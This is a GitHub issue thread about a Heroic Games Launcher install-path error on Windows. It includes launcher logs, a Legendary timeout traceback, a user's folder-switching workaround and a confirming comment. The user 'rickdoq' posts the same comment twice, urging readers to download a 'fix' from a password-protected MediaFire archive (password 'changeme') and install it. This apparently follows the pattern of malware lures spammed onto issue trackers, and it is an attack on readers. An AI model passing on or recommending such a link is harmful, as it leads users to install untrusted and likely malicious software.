### ISSUE TITLE
Solution guide for problems: (warning: path might on be writable), (select install path) and (not enough disk space) 

### ISSUE THREAD

**Issue by MaviYonca** [Heroic-Games-Launcher/HeroicGamesLauncher#3985]
### Describe the bug

When I try to download a game I get a (warning: path might on be writable) error. but if I click on force install and download the game, I get a game not found error when I press play.

![Ekran görüntüsü 2024-08-29 091849](https://github.com/user-attachments/assets/408fbf6d-9d46-45c2-a991-45e625ec62a3)

### Add logs

```text
(14:42:54) INFO:    [Legendary]:        Legendary location: C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary
(14:42:54) INFO:    [Gog]:              GOGDL location: C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\gogdl
(14:42:54) INFO:    [Connection]:       Connectivity: check-online
(14:42:54) INFO:    [Connection]:       Pinging external endpoints
(14:42:54) INFO:    [Gog]:              Checking for existing gog manifests
(14:42:54) WARNING: [Backend]:          Protocol already registered.
(14:42:55) INFO:    [Connection]:       Connectivity: online
(14:42:55) ERROR:   [Gog]:              Unable to syncQueued playtime, userData not present
(14:42:55) INFO:    [Gog]:              Running command: GOGDL_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\gogdlConfig powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\gogdl`"" -Wait -NoNewWindow -ArgumentList "`"--auth-config-path`"","`"C:\\Users\\mpina\\AppData\\Roaming\\heroic\\gog_store\\auth.json`"","`"auth`""
(14:42:55) INFO:    [Frontend]:         Refreshing undefined Library
(14:42:55) WARNING: [Backend]:          refresh not implemented on Sideload Library Manager
(14:42:55) INFO:    [Legendary]:        Refreshing library...
(14:42:55) INFO:    [Legendary]:        Refreshing Epic Games...
(14:42:55) INFO:    [Backend]:          Frontend Ready
(14:42:56) INFO:    [Backend]:          Checking for new Heroic Updates
(14:42:59) INFO:    [Backend]:          Checking for current version changelog
(14:42:59) INFO:    [Legendary]:        Running command: LEGENDARY_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"list`"","`"--third-party`""
(14:42:59) INFO:    [Backend]:          VCRuntime is installed
(14:42:59) INFO:    [WineDownloader]:   Updating wine versions info
(14:42:59) INFO:    [WineDownloader]:   Fetching upstream information...
(14:43:00) INFO:    [Legendary]:        Running command: LEGENDARY_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"--version`""
(14:43:00) INFO:    [Gog]:              Running command: GOGDL_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\gogdlConfig powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\gogdl`"" -Wait -NoNewWindow -ArgumentList "`"--auth-config-path`"","`"C:\\Users\\mpina\\AppData\\Roaming\\heroic\\gog_store\\auth.json`"","`"--version`""
(14:43:01) INFO:    [Nile]:             Running command: NILE_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\nile_config powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\nile`"" -Wait -NoNewWindow -ArgumentList "`"--version`""
(14:43:01) INFO:    [Backend]:          Starting the Download Queue
(14:43:01) INFO:    [Backend]:          Launching Among Us (963137e4c29d4c79a81323b8fab03a40)
(14:43:01) INFO:    [Backend]:          Preventing display from sleep
(14:43:01) INFO:    [Backend]:          Preventing machine to sleep
(14:43:02) INFO:    [Legendary]:        Launching Among Us: HEROIC_APP_NAME=963137e4c29d4c79a81323b8fab03a40 HEROIC_APP_RUNNER=legendary GAMEID=umu-0 HEROIC_APP_SOURCE=epic STORE=egs LEGENDARY_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"launch`"","`"963137e4c29d4c79a81323b8fab03a40`"","`"--language`"","`"en`""
(14:43:02) INFO:    [Backend]:          Preventing display to sleep
(14:43:06) INFO:    [Legendary]:        Running command: LEGENDARY_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"--version`""
(14:43:06) INFO:    [Gog]:              Running command: GOGDL_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\gogdlConfig powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\gogdl`"" -Wait -NoNewWindow -ArgumentList "`"--auth-config-path`"","`"C:\\Users\\mpina\\AppData\\Roaming\\heroic\\gog_store\\auth.json`"","`"--version`""
(14:43:06) INFO:    [Nile]:             Running command: NILE_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\nile_config powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\nile`"" -Wait -NoNewWindow -ArgumentList "`"--version`""
(14:43:06) INFO:    [Backend]:          
System Information:
CPU: 12x 11th Gen Intel(R) Core(TM) i5-11400H @ 2.70GHz
Memory: 16.91 GB (used: 4.29 GB)
GPUs:
  GPU 0:
    Name: Intel Corporation TigerLake-H GT1 [UHD Graphics]
    IDs: D=9a68 V=8086 SD=1360 SV=152d
    Driver: 27.20.100.9365
  GPU 1:
    Name: NVIDIA Corporation GA107M [GeForce RTX 3050 Ti Mobile]
    IDs: D=25a0 V=10de SD=1362 SV=152d
    Driver: 560.94
OS: Microsoft Windows 11 Home Single Language 10.0.22631 (win32)

The current system is not a Steam Deck
We are not running inside a Flatpak container

Software Versions:
  Heroic: 2.15.1 Emeth
  Legendary: 0.20.35 Lowlife (Heroic)
  gogdl: 1.1.1
  comet: comet 0.1.2

  Nile: 1.1.1 Will A. Zeppeli

(14:43:27) INFO:    [Legendary]:        Game list updated, got 367 games & DLCs
(14:43:27) WARNING: [Backend]:          listUpdateableGames not implemented on Sideload Library Manager
(14:43:27) INFO:    [Legendary]:        Checking for game updates: LEGENDARY_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"list`"","`"--third-party`""
(14:43:39) ERROR:   [Backend]:          Error when checking for Heroic updates Error: error request aborted
    at createError (C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar\node_modules\axios\lib\core\createError.js:16:15)
    at IncomingMessage.handlerStreamAborted (C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar\node_modules\axios\lib\adapters\http.js:301:18)
    at IncomingMessage.emit (node:events:519:28)
    at IncomingMessage._destroy (node:_http_incoming:224:10)
    at _destroy (node:internal/streams/destroy:121:10)
    at IncomingMessage.destroy (node:internal/streams/destroy:83:5)
    at TLSSocket.socketCloseListener (node:_http_client:460:11)
    at TLSSocket.emit (node:events:531:35)
    at node:net:338:12
    at TCP.done (node:_tls_wrap:657:7)
(14:43:42) INFO:    [WineDownloader]:   wine versions updated
(14:43:42) ERROR:   [Backend]:          Could not find default wine version
(14:43:49) INFO:    [Legendary]:        Found 0 games to update
(14:43:55) INFO:    [Backend]:          Stopping Display Power Saver Blocker
(14:43:55) INFO:    [Frontend]:         Refreshing legendary Library
(14:43:55) INFO:    [Legendary]:        Refreshing library...
(14:43:55) INFO:    [Legendary]:        Refreshing Epic Games...
(14:43:55) INFO:    [Backend]:          Stopping Power Saver Blocker
(14:43:55) INFO:    [Backend]:          Stopping Display Sleep Blocker
(14:43:56) INFO:    [Legendary]:        Running command: LEGENDARY_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"list`"","`"--third-party`""
(14:44:11) INFO:    [Legendary]:        Game list updated, got 367 games & DLCs
(14:52:28) INFO:    [Legendary]:        Running command: LEGENDARY_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"--version`""
(14:52:28) INFO:    [Gog]:              Running command: GOGDL_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\gogdlConfig powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\gogdl`"" -Wait -NoNewWindow -ArgumentList "`"--auth-config-path`"","`"C:\\Users\\mpina\\AppData\\Roaming\\heroic\\gog_store\\auth.json`"","`"--version`""
(14:52:28) INFO:    [Nile]:             Running command: NILE_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\nile_config powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\nile`"" -Wait -NoNewWindow -ArgumentList "`"--version`""
(14:52:28) INFO:    [Legendary]:        Checking if EOS Overlay is enabled: LEGENDARY_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"eos-overlay`"","`"info`""
(14:52:30) INFO:    [Legendary]:        Abort command "LEGENDARY_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"eos-overlay`"","`"info`"""
(14:52:32) INFO:    [Legendary]:        Running command: LEGENDARY_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"--version`""
(14:52:32) INFO:    [Gog]:              Running command: GOGDL_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\gogdlConfig powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\gogdl`"" -Wait -NoNewWindow -ArgumentList "`"--auth-config-path`"","`"C:\\Users\\mpina\\AppData\\Roaming\\heroic\\gog_store\\auth.json`"","`"--version`""
(14:52:32) INFO:    [Nile]:             Running command: NILE_CONFIG_PATH=C:\Users\mpina\AppData\Roaming\heroic\nile_config powershell Start-Process "`"C:\Users\mpina\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\nile`"" -Wait -NoNewWindow -ArgumentList "`"--version`""
(14:52:47) INFO:    [Backend]:          Changing Language to: tr
```

### Steps to reproduce

1. Get warning: path might on be writable error
2. Click on force install
3. when downloading the game only the download part increases, the disk partition always remains 0
4. after the game downloads, I press play and it gives a game not found error and deletes the game

### Expected behavior

should not give a warning: path might on be writable error

### Screenshots

![Ekran görüntüsü 2024-08-29 091849](https://github.com/user-attachments/assets/d0fd6b29-9cd9-4db6-bc5f-fdbd61538e55)
![Ekran görüntüsü 2024-08-29 092220](https://github.com/user-attachments/assets/d4c5dff0-8e13-4bc7-8ef7-e9752bd25ae1)
![Ekran görüntüsü 2024-08-29 091944](https://github.com/user-attachments/assets/72445e6e-fa9f-424d-a09d-23d7e8b84576)
![Ekran görüntüsü 2024-08-29 102758](https://github.com/user-attachments/assets/4966a1cd-ffe4-461a-840f-9fbe52cfab25)
![Ekran görüntüsü 2024-08-29 144409](https://github.com/user-attachments/assets/f81c5b5e-83bb-47d1-b320-f7bbfc1be070)

### Heroic Version

Latest Stable

### System Information

- OS Windows 11 Home 
- Heroic v2.15.1

### Additional information

Let's talk about how I solved this problem

the first thing you need to do is reinstall heroic
then say download the game you want to download, if you get the (warning: path might on be writable) error, go to (default installation path) in the settings and select a different folder (or create a new folder) and say download the game again.
do this until you get (not enough disk space) error instead of (warning: path might on be writable) error.
After finding the folder with (not enough disk space) error, press fored install and in the downloads section, check if the disk partition is 0. If the disk remains 0 for 4 or 5 minutes, cancel the download and try again in another folder with (not enough disk space) error. if the disk starts to increase, the problem is solved. start the game and play. 

Note: the game I downloaded was an online game and there was no lobby problem in the game. as an extra I turned the pc off and on 3 times and tested the game again, there is no problem.

However, after downloading the game to the (not enough disk space) error folder, I tried to download another game to the (warning: path might on be writable) error folder for testing purposes, but this time I got the following error even though the game downloaded and ran.

![Ekran görüntüsü 2024-08-29 144409](https://github.com/user-attachments/assets/9c2c1c52-3065-40c5-bdb5-c2a9ed097ac5)

full text of the error

An error has occurred! Try to Logout and Login on your Epic account.
[cli] INFO: Logging in...[Core] INFO: Trying to re-use existing login session...[cli] INFO: Getting game list... (this may take a while)Traceback (most recent call last):
File "urllib3\response.py", line 748, in _error_catcherFile "urllib3\response.py", line 1206, in read_chunked
File "urllib3\response.py", line 1125, in _update_chunk_length
File "socket.py", line 704, in readinto
File "ssl.py", line 1242, in recv_into
File "ssl.py", line 1100, in read
socket.timeout: The read operation timed out
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "requests\models.py", line 820, in generate
File "urllib3\response.py", line 1057, in stream
File "urllib3\response.py", line 1235, in read_chunked
File "contextlib.py", line 137, in __exit__File "urllib3\response.py", line 753, in _error_catcher
urllib3.exceptions.ReadTimeoutError: HTTPSConnectionPool(host='library-service.live.use1a.on.epicgames.com', port=443): Read timed out.
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "legendary\cli.py", line 3161, in <module>
File "legendary\cli.py", line 3072, in main
File "legendary\cli.py", line 207, in list_gamesFile "legendary\core.py", line 526, in get_non_asset_library_items
File "legendary\api\egs.py", line 246, in get_library_items
File "requests\sessions.py", line 602, in get
File "requests\sessions.py", line 589, in request
File "requests\sessions.py", line 746, in send
File "requests\models.py", line 902, in contentFile "requests\models.py", line 826, in generate
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='library-service.live.use1a.on.epicgames.com', port=443): Read timed out.
[12996] Failed to execute script 'cli' due to unhandled exception!

if linux and macos versions have this error, I think it can be solved in a similar way

if there are any other logs, etc. that I should send to fix this issue in future releases, please indicate below.

**Comment by MaviYonca** [comment]
my first language is not English and I translated this text using deepl. sorry for the typos

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by GentMAB** [comment]
Can confirm I have the same bug
